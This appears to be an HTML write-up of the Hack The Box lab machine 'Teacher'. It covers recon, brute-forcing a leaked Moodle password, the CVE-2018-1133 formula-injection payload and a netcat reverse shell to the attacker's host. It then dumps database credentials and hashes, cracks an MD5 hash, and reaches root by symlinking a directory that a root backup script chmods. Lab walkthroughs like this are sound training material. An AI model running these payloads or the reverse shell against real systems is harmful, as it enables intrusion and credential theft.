I"k<h1 id="htb-teacher-101010153-machine-write-up">HTB Teacher (10.10.10.153) MACHINE WRITE-UP</h1>

<h3 id="table-of-contents">TABLE OF CONTENTS</h3>

<hr />

<h2 id="part-1--initial-recon">PART 1 : INITIAL RECON</h2>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>nmap <span class="nt">--min-rate</span> 1000 <span class="nt">-p-</span> <span class="nt">-v</span> 10.10.10.153
<span class="go">
  PORT   STATE SERVICE
  80/tcp open  http

</span><span class="gp">$</span><span class="w"> </span>nmap <span class="nt">-oN</span> teacher.nmap <span class="nt">-p</span> 80 <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-v</span> 10.10.10.153
<span class="go">
  PORT   STATE SERVICE VERSION
  80/tcp open  http    Apache httpd 2.4.25 ((Debian))
  | http-methods:
  |_  Supported Methods: OPTIONS HEAD GET POST
  |_http-server-header: Apache/2.4.25 (Debian)
  |_http-title: Blackhat highschool

</span></code></pre></div></div>
<hr />

<h2 id="part-2--port-enumeration">PART 2 : PORT ENUMERATION</h2>

<h3 id="tcp-port-80-http">TCP PORT 80 (http)</h3>

<ul>
  <li>
    <p>Landing Page:</p>

    <p><img src="./screenshots/80_teacher_home.png" alt="Landing Page" /></p>
  </li>
  <li>
    <p>Check <strong>GALLERY</strong> <a href="http://10.10.10.153/gallery.html#">(<strong><em>/gallery.html</em></strong>)</a></p>

    <p><img src="./screenshots/80_teacher_gallery.png" alt="Gallery Page" /></p>

    <p><strong>NOTE(S)</strong>:</p>
    <ul>
      <li>One of the images failed to load
        <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"#"</span><span class="nt">&gt;&lt;img</span> <span class="na">src=</span><span class="s">"images/5.png"</span> <span class="na">onerror=</span><span class="s">"console.log('That\'s an F');"</span> <span class="na">alt=</span><span class="s">""</span><span class="nt">&gt;&lt;/a&gt;</span>
</code></pre></div>        </div>
        <blockquote>

        </blockquote>
      </li>
    </ul>
  </li>
  <li>Open the image using <code class="highlighter-rouge">curl</code>
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>curl http://10.10.10.153/images/5.png
<span class="go">
  Hi Servicedesk,

  I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

  Could you guys figure out what the last charachter is, or just reset it?

  Thanks,
  Giovanni

</span></code></pre></div>    </div>
    <p><strong>NOTE(S)</strong>:</p>
    <ul>
      <li>An incomplete password was given for <strong>Giovanni</strong></li>
      <li>Where to use the credentials is stil unknown
        <blockquote>

        </blockquote>
      </li>
    </ul>
  </li>
  <li><strong><code class="highlighter-rouge">gobuster</code></strong> on <strong><code class="highlighter-rouge">http://10.10.10.153/</code></strong>:
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>gobuster <span class="nt">-u</span> http://10.10.10.153 <span class="nt">-w</span> /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
<span class="go">
  /images (Status: 301)
  /css (Status: 301)
  /manual (Status: 301)
  /js (Status: 301)
  /javascript (Status: 301)
  /fonts (Status: 301)
  /phpmyadmin (Status: 403)
  /moodle (Status: 301)

</span></code></pre></div>    </div>
  </li>
  <li>
    <p><strong><code class="highlighter-rouge">http://10.10.10.153/moodle/</code></strong>:</p>

    <p><img src="./screenshots/80_teacher_moodle.png" alt="Moodle Home" /></p>

    <ul>
      <li>
        <p>Login Page:</p>

        <p><img src="./screenshots/80_teacher_moodle_login.png" alt="Moodle Login" /></p>
      </li>
    </ul>
  </li>
</ul>

<hr />

<h2 id="part-3--exploitation">PART 3 : EXPLOITATION</h2>

<ol>
  <li>Complete <strong>giovanni</strong>’s password:
    <ul>
      <li><strong><em>moodle_login.py</em></strong>
        <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">requests</span> <span class="k">as</span> <span class="n">r</span>

<span class="n">characters</span> <span class="o">=</span> <span class="s">"abcdefghijklmnopqrstuvwxyz1234567890!@#$</span><span class="si">%</span><span class="s">^&amp;*()"</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">characters</span><span class="p">:</span>
    
    <span class="n">creds</span> <span class="o">=</span> <span class="p">{</span>
        <span class="s">"username"</span><span class="p">:</span> <span class="s">"Giovanni"</span><span class="p">,</span>
        <span class="s">"password"</span><span class="p">:</span> <span class="s">"Th4C00lTheacha"</span> <span class="o">+</span> <span class="n">i</span>
    <span class="p">}</span>
    
    <span class="n">req</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s">"http://10.10.10.153/moodle/login/index.php"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">creds</span><span class="p">)</span>

    <span class="n">err_message</span> <span class="o">=</span> <span class="s">"Invalid login"</span>
    <span class="k">if</span> <span class="n">err_message</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">req</span><span class="o">.</span><span class="n">text</span><span class="p">:</span> 
     
        <span class="k">print</span><span class="p">(</span><span class="s">"PASSWORD: "</span> <span class="o">+</span> <span class="n">creds</span><span class="p">[</span><span class="s">"password"</span><span class="p">])</span>
        <span class="k">break</span>
</code></pre></div>        </div>
      </li>
      <li>Run the python script
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python3 moodle_login.py
<span class="go">
</span><span class="gp">  PASSWORD: Th4C00lTheacha#</span><span class="w"> 
</span><span class="go">
</span></code></pre></div>        </div>
      </li>
    </ul>
  </li>
  <li>Login to <strong>moodle</strong> using <strong><code class="highlighter-rouge">giovanni : Th4C00lTheacha#</code></strong>:
    <ol>
      <li>Set-up moodle exploit – <strong>Evil Teacher</strong> (<a href="https://blog.ripstech.com/2018/moodle-remote-code-execution/]">CVE-2018-1133</a>)
        <ol>
          <li>Select a quiz</li>
          <li>Click <strong>Edit quiz</strong></li>
          <li>Add a new question
            <ol>
              <li>Select <strong>Calculated</strong> then <strong>Add</strong></li>
              <li>Fill up the required fields:
                <ul>
                  <li>Question name: &lt;ANYTHING GOES HERE&gt;</li>
                  <li>Question text: &lt;ANYTHING GOES HERE&gt;</li>
                  <li>Answer 1 Formula: <code class="highlighter-rouge">/*{a*/</code>$_GET[cmd]<code class="highlighter-rouge">;//{x}}</code></li>
                  <li>Grade: 100%</li>
                </ul>
              </li>
            </ol>
          </li>
          <li>Click <strong>Save changes</strong></li>
          <li>Click <strong>Next page</strong></li>
        </ol>
      </li>
      <li>Set-up local netcal listener
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>nc <span class="nt">-lvp</span> 4444
</code></pre></div>        </div>
      </li>
      <li>Append <code class="highlighter-rouge">&amp;cmd=(date; nc &lt;HTB IPv4&gt; 4444 -e /bin/bash)</code> to URL</li>
      <li>Submit the URL</li>
    </ol>
  </li>
  <li>While inside the shell:
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">id</span>
<span class="go">   


</span><span class="gp">$</span><span class="w"> </span>python <span class="nt">-c</span> <span class="s1">'import pty; pty.spawn("/bin/bash")'</span>
<span class="go"> 
</span><span class="gp">$</span><span class="w"> </span><span class="nb">cat</span> /etc/passwd | <span class="nb">grep </span>bash
<span class="go">
  root:x:0:0:root:/root:/bin/bash
  giovanni:x:1000:1000:Giovanni,1337,,:/home/giovanni:/bin/bash

</span><span class="gp">$</span><span class="w"> </span>find /var/www <span class="nt">-name</span> <span class="k">*</span>conf<span class="k">*</span> 2&gt; /dev/null
<span class="go">
  ...omitted...
  /var/www/html/moodle/config.php
  ...omitted...

</span><span class="gp">$</span><span class="w"> </span><span class="nb">cat</span> /var/www/html/moodle/config.php
</code></pre></div>    </div>
    <ul>
      <li><strong><code class="highlighter-rouge">/var/www/html/moodle/config.php</code></strong>:
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>  <span class="c1">// Moodle configuration file</span>

<span class="nb">unset</span><span class="p">(</span><span class="nv">$CFG</span><span class="p">);</span>
<span class="k">global</span> <span class="nv">$CFG</span><span class="p">;</span>
<span class="nv">$CFG</span> <span class="o">=</span> <span class="k">new</span> <span class="k">stdClass</span><span class="p">();</span>

<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">dbtype</span>    <span class="o">=</span> <span class="s1">'mariadb'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">dblibrary</span> <span class="o">=</span> <span class="s1">'native'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">dbhost</span>    <span class="o">=</span> <span class="s1">'localhost'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">dbname</span>    <span class="o">=</span> <span class="s1">'moodle'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">dbuser</span>    <span class="o">=</span> <span class="s1">'root'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">dbpass</span>    <span class="o">=</span> <span class="s1">'Welkom1!'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">prefix</span>    <span class="o">=</span> <span class="s1">'mdl_'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">dboptions</span> <span class="o">=</span> <span class="k">array</span> <span class="p">(</span>
  <span class="s1">'dbpersist'</span> <span class="o">=&gt;</span> <span class="mi">0</span><span class="p">,</span>
  <span class="s1">'dbport'</span> <span class="o">=&gt;</span> <span class="mi">3306</span><span class="p">,</span>
  <span class="s1">'dbsocket'</span> <span class="o">=&gt;</span> <span class="s1">''</span><span class="p">,</span>
  <span class="s1">'dbcollation'</span> <span class="o">=&gt;</span> <span class="s1">'utf8mb4_unicode_ci'</span><span class="p">,</span>
<span class="p">);</span>

<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">wwwroot</span>   <span class="o">=</span> <span class="s1">'http://10.10.10.153/moodle'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">dataroot</span>  <span class="o">=</span> <span class="s1">'/var/www/moodledata'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">admin</span>     <span class="o">=</span> <span class="s1">'admin'</span><span class="p">;</span>

<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="na">directorypermissions</span> <span class="o">=</span> <span class="mo">0777</span><span class="p">;</span>

<span class="k">require_once</span><span class="p">(</span><span class="nx">__DIR__</span> <span class="o">.</span> <span class="s1">'/lib/setup.php'</span><span class="p">);</span>

<span class="c1">// There is no php closing tag in this file,</span>
<span class="c1">// it is intentional because it prevents trailing whitespace problems!</span>
</code></pre></div>        </div>
      </li>
      <li><strong>MariaDB CLI</strong>:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>mariadb <span class="nt">-uroot</span> <span class="nt">-pWelkom1</span><span class="o">!</span>
<span class="go">
</span><span class="gp">$</span><span class="w"> </span>MariaDB <span class="o">[(</span>none<span class="o">)]&gt;</span> SHOW databases<span class="p">;</span>
<span class="go">
  +--------------------+
  | Database           |
  +--------------------+
  | ...omitted...      |
  | moodle             |
  | ...omitted...      |
  +--------------------+

</span><span class="gp">$</span><span class="w"> </span>MariaDB <span class="o">[(</span>none<span class="o">)]&gt;</span> USE moodle
<span class="go">
</span><span class="gp">$</span><span class="w"> </span>MariaDB <span class="o">[</span>moodle]&gt; SHOW tables<span class="p">;</span>
<span class="go">    
  +----------------------------------+
  | Tables_in_moodle                 |
  +----------------------------------+
  | ...omitted...                    |
  | mdl_user                         |
  | ...omitted...                    |
  +----------------------------------+

</span><span class="gp">$</span><span class="w"> </span>MariaDB <span class="o">[</span>moodle]&gt; SELECT <span class="k">*</span> FROM mdl_user<span class="p">;</span>
<span class="go">   
  +------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
  | id   | auth   | confirmed | policyagreed | deleted | suspended | mnethostid | username    | password                                                     | idnumber | firstname  | lastname | email          | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin  | currentlogin | lastip        | secret | picture | url | description                                                               | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename |
  +------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
</span><span class="gp">  |    1 | manual |         1 |            0 |       0 |         0 |          1 | guest       | $</span>2y<span class="nv">$10$ywuE5gDlAlaCu9R0w7pKW</span>.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |          | Guest user |          | root@localhost |         0 |   |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |  |       0 |     | This user is a special user that allows read-only access to some courses. | 1 |          1 |          0 |           2 |             1 |           0 |           0 |   1530058999 |    0 | NULL     | NULL             | NULL              | NULL       | NULL          |
<span class="gp">  |    2 | manual |         1 |            0 |       0 |         0 |          1 | admin       | $</span>2y<span class="nv">$10$7VPsdU9</span>/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |          | Admin      | User     | gio@gio.nl     |         0 |   |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059097 | 1530059573 | 1530059097 |   1530059307 | 192.168.206.1 |  |       0 |     |                                                                           | 1 |          1 |          0 |           1 |             1 |           0 |           0 |   1530059135 |    0 | NULL     |                  |                   |            |               |
<span class="gp">  |    3 | manual |         1 |            0 |       0 |         0 |          1 | giovanni    | $</span>2y<span class="nv">$10$38V6kI7LNudORa7lBAT0q</span>.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |          | Giovanni   | Chhatta  | Giio@gio.nl    |         0 |   |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059681 | 1555841309 | 1555840529 |   1555840557 | 10.10.15.36   |  |       0 |     |                                                                           | 1 |          1 |          0 |           2 |             1 |           0 |  1530059291 |   1530059291 |    0 |          |                  |                   |            |               |
<span class="go">  | 1337 | manual |         0 |            0 |       0 |         0 |          0 | Giovannibak | 7a860966115182402ed06375cf0a22af                             |          |            |          |                |         0 |   |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |  |       0 |     | NULL                                                                      | 1 |          1 |          0 |           2 |             1 |           0 |           0 |            0 |    0 | NULL     | NULL             | NULL              | NULL       | NULL          |
  +------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+

</span><span class="gp">$</span><span class="w"> </span>MariaDB <span class="o">[</span>moodle]&gt; <span class="se">\q</span>
</code></pre></div>        </div>
        <p><strong>NOTE(S)</strong>:</p>
        <ul>
          <li>The user <strong>Giovannibak</strong> has a different password hash than the rest</li>
          <li><strong>Giovannibak</strong>’s password is in <strong>MD5</strong>
            <blockquote>

            </blockquote>
          </li>
        </ul>
      </li>
      <li>Decrypt <strong>Giovannibak</strong>’s password:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">hashcat --force -m0 7a860966115182402ed06375cf0a22af /usr/share/wordlists/rockyou.txt
</span><span class="gp">#</span><span class="w"> </span>7a860966115182402ed06375cf0a22af:expelled
</code></pre></div>        </div>
      </li>
      <li>Go back to <strong>www-data</strong> shell
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">su giovanni
</span><span class="gp">#</span><span class="w"> </span>Password: expelled
<span class="go">
id
</span><span class="gp">#</span><span class="w"> </span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>giovanni<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>giovanni<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>giovanni<span class="o">)</span>
<span class="go">     
cat ~/user.txt
</span><span class="gp">#</span><span class="w"> </span>fa9ae187462530e841d9e61936648fa7
</code></pre></div>        </div>
      </li>
    </ul>
  </li>
</ol>

<hr />

<h2 id="step-4--privilege-escalation-giovanni---root">STEP 4 : Privilege Escalation <strong>(giovanni -&gt; root)</strong></h2>

<ol>
  <li>Download and upload <a href="https://github.com/DominicBreuker/pspy">pspy</a>
    <ol>
      <li>Check system architecture of FriendZone
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">uname -mnop
</span><span class="gp">#</span><span class="w"> </span>teacher x86_64 unknown GNU/Linux
</code></pre></div>        </div>
        <p><strong>Note</strong>:</p>
        <ul>
          <li>The system runs on 64-bit</li>
        </ul>
      </li>
      <li>Upload <a href="https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy64">pspy64</a> to Teacher
        <ul>
          <li>Local terminal:
            <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">python -m SimpleHTTPServer
</span><span class="gp">#</span><span class="w"> </span>Serving HTTP on 0.0.0.0 port 8000 ...
</code></pre></div>            </div>
          </li>
          <li>Teacher shell:
            <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">wget -O /tmp/pspy64 http://&lt;HTB IPv4&gt;</span>:8000/pspy64
<span class="gp">#</span><span class="w"> </span>‘/tmp/pspy64’ saved <span class="o">[</span>4468984/4468984]
<span class="go">        
chmod +x /tmp/pspy64
</span></code></pre></div>            </div>
          </li>
        </ul>
      </li>
    </ol>
  </li>
  <li>Run <strong>pspy64</strong>
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">./pspy64
</span><span class="gp">#</span><span class="w"> </span>...
<span class="gp">#</span><span class="w"> </span>04:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>1342   | /bin/bash /usr/bin/backup.sh
<span class="gp">#</span><span class="w"> </span>...
<span class="gp">#</span><span class="w"> </span>05:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>1354   | /bin/bash /usr/bin/backup.sh
<span class="gp">#</span><span class="w"> </span>...
<span class="gp">#</span><span class="w"> </span>06:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>1375   | /bin/bash /usr/bin/backup.sh
<span class="gp">#</span><span class="w"> </span>...
</code></pre></div>    </div>
    <p><strong>Notes</strong>:</p>
    <ul>
      <li>There is a script called <strong><em>backup.sh</em></strong></li>
      <li>It runs every minute</li>
    </ul>
  </li>
  <li>Examine <strong><em>/usr/bin/backup.sh</em></strong>
    <ul>
      <li><strong><em>backup.sh</em></strong> contents:
        <div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="nb">cd</span> /home/giovanni/work<span class="p">;</span>
<span class="nb">tar</span> <span class="nt">-czvf</span> tmp/backup_courses.tar.gz courses/<span class="k">*</span><span class="p">;</span>
<span class="nb">cd </span>tmp<span class="p">;</span>
<span class="nb">tar</span> <span class="nt">-xf</span> backup_courses.tar.gz<span class="p">;</span>
<span class="nb">chmod </span>777 <span class="k">*</span> <span class="nt">-R</span><span class="p">;</span>
</code></pre></div>        </div>
        <p><strong>Notes</strong>:</p>
      </li>
      <li>The script is being ran by <strong>root</strong> periodically</li>
      <li>Contents of the <code class="highlighter-rouge">courses/</code> directory are compressed
        <ul>
          <li>The compressed file is saved in <code class="highlighter-rouge">~/work/tmp</code></li>
        </ul>
      </li>
      <li>The compressed file is decompressed on where it is saved</li>
      <li>The first <strong>tar</strong> and <strong>chmod</strong> use wildcards (“<strong>*</strong>”)</li>
      <li>Everything inside <code class="highlighter-rouge">~/work/tmp</code> will have its permissions changed</li>
    </ul>
  </li>
  <li>Exploit <strong><em>/usr/bin/backup.sh</em></strong>
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">cd /home/giovanni/work

rm -rf tmp

ln -s / ./tmp
</span></code></pre></div>    </div>
    <ul>
      <li>after <strong><em>backup.sh</em></strong> runs:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">cat /root/root.txt
</span><span class="gp">#</span><span class="w"> </span>4f3a83b42ac7723a508b8ace7b8b1209
</code></pre></div>        </div>
        <p><strong>Notes</strong>:</p>
      </li>
      <li><code class="highlighter-rouge">~/work/tmp</code> was changed to have a symbolic link to <code class="highlighter-rouge">/</code></li>
      <li>Now, everything inside <code class="highlighter-rouge">/</code> has <code class="highlighter-rouge">-rwxrwxrwx</code>permissions</li>
    </ul>
  </li>
</ol>
:ET